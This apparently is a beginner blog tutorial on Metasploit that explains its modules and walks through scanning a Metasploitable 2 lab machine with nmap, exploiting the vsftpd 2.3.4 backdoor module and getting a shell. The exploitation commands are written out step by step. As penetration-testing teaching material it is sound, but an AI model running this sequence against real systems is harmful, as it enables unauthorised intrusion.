Learning Metasploit: From Scanning to Shell Access

What is Metasploit? Why should we use it?
Metasploit is one of the most powerful and widely used tools in the field of ethical hacking and penetration testing. It’s an open-source framework that helps security professionals identify, exploit, and validate vulnerabilities in systems. Whether you're a beginner learning the basics or an advanced penetration tester, Metasploit provides a structured environment to simulate real-world attacks, develop payloads, and test defenses — all legally and safely.
How Does Metasploit Work?
Metasploit works by using a modular system that allows you to launch attacks in a controlled environment. It consists of:
Exploit Modules – Code that takes advantage of a specific vulnerability.
Payloads – What runs after successful exploitation (like opening a reverse shell).
Auxiliary Modules – Tools for scanning, fuzzing, sniffing, and more.
Encoders – To help payloads bypass antivirus or firewalls.
Listeners – Waiting for the payload to connect back to your system.
In simple terms:
You scan a system → find a vulnerability → launch an exploit → gain access → interact with the target.
Metasploit automates much of this, making it perfect for learning how real-world attacks happen — legally and safely.
Real Example: Exploiting a Target with Metasploit
Let’s walk through a simple example of how Metasploit can be used to exploit a vulnerable machine. For this demo, I used Kali Linux as the attacker machine and Metasploitable 2 as the target.
Step 1: Scanning the Target with Nmap
First, we use Nmap to identify open ports and services:
bashCopyEditnmap -sV 192.168.1.100
This shows services like FTP, SSH, and Apache running — now we know what’s available to attack.
Step 2: Launching Metasploit Framework
Start Metasploit with:
bashCopyEditmsfconsole
Then search for an exploit:
bashCopyEditsearch vsftpd
Let’s say we found:exploit/unix/ftp/vsftpd_234_backdoor
Step 3: Using the Exploit
bashCopyEdituse exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.1.100
run
Boom — if the target is vulnerable, Metasploit gives you a shell access or even a Meterpreter session.
Step 4: Interact with the Target
Once you’re in, you can use commands like:
bashCopyEditwhoami
uname -a
You now have access — like a real hacker. But remember, always test legally!
Disclaimer
This tutorial is for educational purposes only. Always get permission before testing any system.
Understanding Metasploit is an important step for anyone learning about cybersecurity. With practice, ethical intent, and the right labs, it becomes a crucial skill in a pentester's toolbox.
Subscribe to my newsletter
Read articles from Prerit Singh directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
